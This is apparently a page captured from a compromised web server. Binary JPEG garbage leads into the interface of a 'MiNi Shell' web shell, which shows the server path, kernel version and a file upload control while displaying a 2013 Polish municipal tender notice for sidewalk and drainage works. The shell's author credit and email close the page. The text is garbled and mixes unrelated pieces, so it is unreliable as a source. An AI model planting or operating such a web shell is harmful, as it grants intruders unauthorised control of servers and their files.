JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/21303-N-2013.html

<p class="kh_header"><b>Spytkowice: Budowa  chodnika i kanalizacji  deszczowej  przy ul.Jana  Pawła II 
   w  Ryczowie  w  ramach  przebudowy  drogi powiatowej  nr  1772K 
                                    Tłuczań -Ryczów -Łączany</b><br>
<b>Numer ogłoszenia: 21303 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Spytkowice , ul. Zamkowa 12, 34-116 Spytkowice, woj. małopolskie, tel. 033 8791820, faks 033 8791560.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spytkowice.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  chodnika i kanalizacji  deszczowej  przy ul.Jana  Pawła II 
   w  Ryczowie  w  ramach  przebudowy  drogi powiatowej  nr  1772K 
                                    Tłuczań -Ryczów -Łączany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest :   Budowa  chodnika i kanalizacji  deszczowej  przy ul.Jana  Pawła II  w Ryczowie  w   ramach przebudowy drogi powiatowej  nr 1772K  Tłuczań -Ryczów -Łączany  prace obejmować będą  :

2. Zakres rzeczowy obejmuje:   Wykonanie chodnika o długości 618 mb,    
 2.1 Wymagania ogólne 
1) Wprowadzenie i utrzymanie organizacji ruchu na czas budowy - 1,000 kpl
2) Roboty pomiarowe przy liniowych robotach ziemnych - Inwentaryzacja powykonawcza +  
    odtworzenie 1 punktu państwowej osnowy - 0,620 km

2.2 Roboty przygotowawcze 
1) Roboty pomiarowe przy liniowych robotach ziemnych - 0,620 km 
2) Usunięcie krzewów twardych - 140,000 m2
3) Prześwietlanie korony drzew, pień Fi 21-30cm - 5,000 szt. 
4) Usunięcie ziemi urodzajnej ze skarpy nasypu wału, zdjęcie humusu - 1 252,000 m2
5) Mechaniczne cięcie szczelin, w nawierzchni z mas mineralno-bitumicznych, głębokość  
    cięcia 5 cm - 620,000 m
6) Rozebranie nawierzchni z mas mineralno - bitum. mechanicznie, gr. 4 cm - 354,000 m2
7) Rozebranie podbudowy z kruszywa, mechan., gr. 15 cm - zjazdy bramowe - 227,000 m2
8) Rozebranie nawierzchni i chodników, płyty chodnikowe betonowe 50x50x7 na podsypce  
    cem-piask., ręcznie - kostka betonowa gr. 8cm - 32,000 m2
9) Rozebranie nawierzchni z płyt drogowych betonowych, z wypełnieniem spoin zaprawą  
    cementową, grubość płyt 15 cm - 34,000 m2
10) Rozebranie przepustów rurowych, rury betonowe Fi 50 cm - 55,000 m
11) Rozebranie przepustów rurowych, ścianki czołowe i ławy betonowe - 7,200 m3
12) Rozbiórka elementów, żelbetowych, rozebranie schodów - 3,000 m3
13) Odwóz do 1km materiałów z rozbiórki i nadmiaru humusu wraz z utylizacją- 184,310 m3
14) Słupy żelbetowe linii NN, demontaż słupa rozkracznego - 1,000 szt
15) Wykopy wraz z zasypaniem dla słupów energetycznych gł. wykopu do 1.5 m - 4,000 m3
16) Montaż i stawianie słupów wirowanych 1-żerdziowych, z ustojem prefabrykowanym,  
      Żerdź 10,5 m -1,000 słup
17) Montaż przewodów izolowanych linii napowietrznej NN typu AsXSn lub podobnych,  
       przewód 4x70+2x25 mm2 - 0,053 km
18) Montaż przewodów izolowanych linii napowietrznej NN typu AsXSn lub podobnych, 
      przewód 4x50 mm2 [4x25mm2] - 0,027 km
19) Montaż uziomów lub przewodów uziemiających - 3,000 m
20) Rury ochronne Fi 110 mm, PE - 18,000 m

2.3 Roboty ziemne 
1) Roboty ziemne koparkami przedsiębiernymi - 536,440 m3
2) Rowki pod krawężniki i ławy krawężnikowe, 40x40 cm - 685,000 m
3) Wykopy obiektowe wykonywane ręcznie ze złożeniem ziemi na odkład - 12,000 m3
4) Nasypy wykonywane koparkami zgarniakowymi z bezpośrednim przerzutem gruntu  
    uzyskanego z ukopu - 347,280 m3

2.4 Odwodnienie korpusu drogowego 
1) Kanały z rur typu PVC łączone na wcisk, Fi 400 mm - 548,000 m
2) Kanały z rur typu PVC łączone na wcisk, Fi 160 mm - 60,000 m
3) Obsypka rurociągu kruszywem dowiezionym, piasek - 202,140 m3
4) Studzienki ściekowe z gotowych elementów, uliczna betonowa, Fi 500 mm z osadnikiem 
    bez syfonu /z pierścieniem odciążającym i kratkami żeliwnymi krawężnikowo-
    jezdniowymi -12,000 szt
5) Studzienka wpustowa za chodnikiem z rury karbowanej fi 315 mm - 11,000 szt
6) Studnie rewizyjne z kręgów betonowych w gotowym wykopie, kręgi Fi 1000 mm, 
     głębokość 3 m -  18,000 szt

2.5 Podbudowa 
1) Profilowanie i zagęszczanie podłoża wykonywane mechanicznie - 1 104,000 m2
2) Podbudowa z kruszywa naturalnego, warstwa dolna /pod krawężnikiem, ściekiem i 
    podbudową na jezdni -82,000 m3
3) Podbudowa z kruszyw łamanych warstwa górna gr. warstwy 5 cm /jezdnia/ - 102,000 m2
4) Podbudowa z kruszyw łamanych warstwa dolna, gr. warstwy 15 cm/jezdnia/ - 102,000 m2
5) Podbudowa z kruszyw łamanych warstwa górna grubość warstwy 5 cm /chodnik i zjazdy, 
    droga do posesji nr 132 - 1 104,000 m2
6) Podbudowa z kruszyw łamanych warstwa dolna, grubość warstwy 15cm /chodnik i zjazdy, 
    droga do posesji nr 132/ - 1 034,000 m2

2.6 Nawierzchnia
1) Nawierzchnie z mieszanek min.-bitum. warstwa ścieralna asfaltowa, gr. 3 cm- 480,000 m2
2) Nawierzchnie z mieszanek mineralno-bitumicznych grysowych, asfaltowe, warstwa 
    wiążąca o gr. 4cm - 480,000 m2
3) Nawierzchnie z kostki brukowej betonowej szarej, grubość 6 cm - 777,000 m2
4) Nawierzchnie z kostki brukowej betonowej kolorowej, grubość 8 cm - 227,000 m2

2.7 Roboty wykończeniowe 
1) Umocnienie skarp płytami ażurowymi 60x40x10 cm na podsypce piaskowej z  
     kołkowaniem kołkami drewnianymi - 51,000 m2
2) Humusowanie i obsianie skarp, humus grubości 5 cm - 475,000 m2
3) Wykonanie budowli siatkowo-kamiennych, kosze z siatki stalowej bez wyprawy - 12,0 m3

2.8 Urządzenia bezpieczeństwa ruchu 
1) Pionowe znaki drogowe słupki z rur stalowych - przestawienie istniejących znaków z 
    wymianą słupków - 2,000 szt
2) Poręcze ochronne, sztywne z pochwytem i przeciągiem z rur z rur Fi 60 mm, rozstaw 
     słupków 1,5 m - 45,000 m

2.9 Elementy ulic 
1) Krawężniki wraz z wykonaniem ław, betonowe wystające 15x30 cm, ława betonowa, 
     podsypka cementowo-piaskowa -  685,000 m
2) Ściek przykrawężnikowy o szerokości 20cm z kostki betonowej gr 8cm na ławie z betonu 
     B16/20 w ilości 0,058m3/mb - 560,000 m
3) Obrzeża betonowe, 30x8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin 
    zaprawą cementową -  930,000 m
4) Ławy pod krawężniki, betonowa z oporem, ława pod obrzeża, beton C16/20 - 15,983 m3
5) Palisada betonowa okrągła, kolor szary, wysokość elementów h 1,2m, Fi 20cm - 32,000 m
6) Ułożenie ścieków drogowych ściek korytkowy o gr. 15 cm na podbudowie - ściek o 
     wymiarach 50x30x8/10cm - 404,000 m
7) Ławy pod krawężniki, betonowa z oporem - ława pod ściek, beton C16/20 - 12,120 m3

2.10 Roboty inne 
1) Budowle żelbetowe o objętości 1,01-10,0m3 - odtworzenie schodów - 3,000 m3
2) Ogrodzenie z siatki w na słupach stalowych osadzonych w gotowym fundamencie lub cokole, na linkach - 6,000 m2
Zgodnie ze złączonym przedmiarem robót, który stanowi załącznik nr 2 do SIWZ oraz projektem budowlano - wykonawczm i specyfikacją techniczną wykonania i odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 34.95.33.00-5, 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  postępowaniu  mogą wziąć  udział wykonawcy  nie  wykluczeni na podstawie 
 art. 24 ust. 1 ustawy Prawo zamówień  publicznych  spełniający warunki  i wymagania  w Specyfikacji istotnych warunków zamówienia  oraz art. 22 ust.1 ustawy   Prawo zamówień publicznych Ocena spełnienia tego warunku na podstawie  dokumentów i oświadczeń  zasda spełnia  nie /spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadanej wiedzy i doświadczenia: wykonawca wykaże wykonanie w okresie  ostatnich  5 lat, co najmniej jednej roboty budowlanej  w zakresie objętym przedmiotem   zamówienia  o wartości  min. 300.000  zł brutto tj, budowy, przebudowy, remont chodnika. Ocena spełnienia tego warunku na podstawie  dokumentów zasda spełnia  nie /spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. W zakresie  dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia:  Wykonawca oświadczy , że dysponuje  osobą/mi  
zdolnymi do wykonania zamówienia w   tym, co najmniej  1 osoby  z uprawnieniami  kierownika budowy w specjalności drogowej.
Ocena spełnienia tego warunku na podstawie  oświadczeń  zasda spełnia  nie /spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wystąpienia niesprzyjających warunków atmosferycznych lub przyczyn technologicznych powodujących konieczność całkowitego przerwania prac, co zostanie   potwierdzone przez inspektora nadzoru, termin realizacji zadania zostanie przedłużony
o taką ilość dni kalendarzowych na jaką roboty zostały przerwane.
2. Zmiana terminu może nastąpić również w przypadkach, o których mowa w
 art. 67 ust. 1 pkt  5 ustawy Pzp tj. wystąpienia zamówień dodatkowych niezbędnych do prawidłowego  wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku wystąpienia niesprzyjających warunków atmosferycznych lub przyczyn technologicznych powodujących konieczność całkowitego przerwania prac, co zostanie   potwierdzone przez inspektora nadzoru, termin realizacji zadania zostanie przedłużony
o taką ilość dni kalendarzowych na jaką roboty zostały przerwane.
2. Zmiana terminu może nastąpić również w przypadkach, o których mowa w
 art. 67 ust. 1 pkt  5 ustawy Pzp tj. wystąpienia zamówień dodatkowych niezbędnych do prawidłowego  wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia.
3. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca
zobowiązany jest poinformować Zamawiającego pisemnie i natychmiast odnotować
to w dzienniku budowy.
4. Istotne dla stron postanowienia umowy w sprawie zamówienia publicznego - stanowi załącznik nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spytkowice.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Spytkowicach  ul.Zamkowa 12  pok.nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 10:00, miejsce: Urząd Gminy w Spytkowicach  ul.Zamkowa 12 pok.nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com